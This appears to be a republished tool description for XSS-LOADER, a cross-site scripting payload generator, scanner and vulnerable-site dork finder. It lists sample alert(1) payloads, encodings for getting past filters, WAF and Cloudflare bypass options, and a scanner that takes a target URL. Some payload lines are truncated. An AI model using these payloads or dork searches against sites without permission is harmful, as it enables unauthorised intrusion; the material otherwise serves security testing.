XSS-LOADER is a all in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER and this is written by Hulya Karabag.
- This tool creates payload for use in xss injection
- Select default payload tags from parameter or write your payload
- It makes xss inj. with Xss Scanner parameter
- It finds vulnerable sites url with Xss Dork Finder parameter
How to use?
Installation
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
Usage
python3 payloader.py
Features
- Basic Payload
- Sets default parameter to :
<script>alert(1)</script>
- Sets default parameter to :
- Div Payload
- Sets default parameter to :
<div onpointerover='alert(1)'>MOVE HERE</div
- Sets default parameter to :
- Img Payload
- Sets default parameter to :
<img src=x onerror=alert('1');>
- Sets default parameter to :
- Body Payload
- Sets default parameter to :
<body ontouchstart=alert(1)>
- Sets default parameter to :
- Svg Payload
- Sets default parameter to :
<svg onload=alert('1')>
- Sets default parameter to :
- Enter Your Payload
- Encodes payload writed by user
- Payload Generator Parameter
- Encodes payload on selected tag
Also Read – XSHOCK : Tool To Exploits ShellShock
- UPPER CASE—->
- UPPER AND LOWER CASE—->
- URL ENCODE —–> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
- HTML ENTITY ENCODE—–> <script>alert(1)</script>
- SPLIT PAYLOAD —–> pt>>alert(1)pt>>
- HEX ENCODE —–> 3c7363726970743e616c6572742831293c2f7363726970743e
- UTF-16 ENCODE —–> Encode payload to utf-16 format.
- UTF-32 ENCODE—–> Encode payload to utf-32 format.
- DELETE TAG —–> “;alert(‘XSS’);//
- UNICODE ENCODE—–> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
- US-ASCII ENCODE —–> ¼script¾alert(1)¼/script¾
- BASE64 ENCODE —–> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- UTF-7 ENCODE —–> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
- PARENTHESIS BYPASS —–>
- UTF-8 ENCODE —–> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
- TAG BLOCK BREAKOUT—–> “>
- SCRIPT BREAKOUT—–>
- FILE UPLOAD PAYLOAD—–> “>.gif
- INSIDE COMMENTS BYPASS—–> –>
- MUTATION PAYLOAD—–> “>
- MALFORMED IMG—–> “>
- SPACE BYPASS—–>
- DOWNLEVEL-HIDDEN BLOCK—–>
- WAF BYPASS PAYLOADS—–> Show Waf Bypass Payload List
- CLOUDFLARE BYPASS PAYLOADS—–> Show Cloudflare Bypass Payload List
- POLYGLOT PAYLOADS—–> Show Polyglot Bypass Payload List
- ALERT PAYLOADS—–> Show Alert Payload List
- ALL CREATE PAYLOAD—–> Show Create All Payloads
- GO BACK MAIN MENU
- EXIT
Xss Scanner
Initially you’ll need to enter url of target Please enter the url like this example==>e.g target —–> http://target.com/index.php?name= Selected for scanning payload list
BASIC PAYLOAD LIST ==> Payload list consisting of script tag
DIV PAYLOAD LIST ==> Payload list consisting of div tag
IMG PAYLOAD LIST ==> Payload list consisting of img tag
BODY PAYLOAD LIST ==> Payload list consisting of body tag
SVG PAYLOAD LIST ==> Payload list consisting of svg tag
MIXED PAYLOAD LIST ==> Payload list consisting of all tag
ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path —–> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in “vulnpayload.txt” after scanning.
Xss Dork Finder
First enter the dork for searching: e.g—->inurl:”search.php?q=” Results will be saved in “dork.txt” after scanning.
Screenshot
